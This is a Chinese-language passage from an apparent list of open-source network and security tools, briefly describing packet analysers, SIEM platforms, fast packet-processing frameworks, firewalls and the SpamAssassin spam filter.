wirehark是一个免费的开源数据包分析器。它用于网络故障排除分析软件和通信协议开发以及培训。Wireshark与tcpdump非常相似但是具有图形化的前端以及一些排序和过滤功能。netsniff-ng是一个免费的Linux网络工具包如果你愿意的话它是你日常Linux网络管道的瑞士军刀。通过零复制机制实现其性能提升因此在数据包接收和传输时内核不需要将数据包从内核空间复制到用户空间反之亦然。Live HTTP headers是一个免费的firefox插件可实时检测您的浏览器请求。它显示了请求的整个头部并可用于查找实现中的安全漏洞。
SIEM 工具
Prelude是一个通用的“安全信息和事件管理”(SIEM)系统。Prelude收集、规范、分类、聚合、关联和报告所有与安全相关的事件而不依赖于导致此类事件的产品品牌或许可证;Prelude是“无代理”。OSSIM是一个非常流行和完整的开源安全架构体系。OSSIM通过将开源产品进行集成从而提供一种能够实现安全监控功能的基础平台。 它的目的是提供一种集中式、有组织的、能够更好地进行监测和显示的框架式系统。FIR快速事件响应一种网络安全事件管理平台。
快速数据包处理
DPDK是一组用于快速数据包处理的库和驱动程序。PFQ是一款针对Linux操作系统的功能性框架可帮助研究人员捕捉网络传输数据包(10G、40G及以上)内核功能处理内核绕过以及获取多节点间的套接字/数据包。PF_RING是一种新型的网络套接字可显着提高数据包捕获速度。PF_RING ZC是一个灵活的数据包处理框架它允许您在任何数据包大小下实现1/10 Gbit线速数据包处理(RX和TX)。它实现了零复制操作包括用于进程间和VM间(KVM)通信的模式。PACKET_MMAP / TPACKET / AF_PACKET在Linux中使用PACKET-MMAP可以提高捕获和传输过程的性能。Netmap高性能网络I/O框架。连同其配套的VALE软件开关它被实现为单个内核模块并且可用于FreeBSDLinux以及现在的Windows。
防火墙
pfSense是一个基于FreeBSD专为防火墙和路由器功能定制的开源版本。它被安装在计算机上作为网络中的防火墙和路由器存在并以可靠性著称且提供往往只存在于昂贵商业防火墙才具有的特性。它可以通过WEB页面进行配置升级和管理而不需要使用者具备FreeBSD底层知识。pfSense通常被部署作为边界防火墙路由器无线接入点DHCP服务器DNS服务器和VPN端点。OPNsense是一个开源易用而且易于构建的基于 FreeBSD 的防火墙和路由平台。包括大多数商业防火墙的特性。提供功能完整却易用的 GUI 管理界面。fwknop通过防火墙中的单数据包授权保护端口。
反垃圾邮件
SpamAssassin一种强大且流行的电子邮件垃圾邮件过滤器采用了多种检测技术。这款反垃圾工具是许多商业产品背后的秘密武器(secret sauce),同时,很多的电子邮件服务商和垃圾过滤(工具)提供商都在使用它。
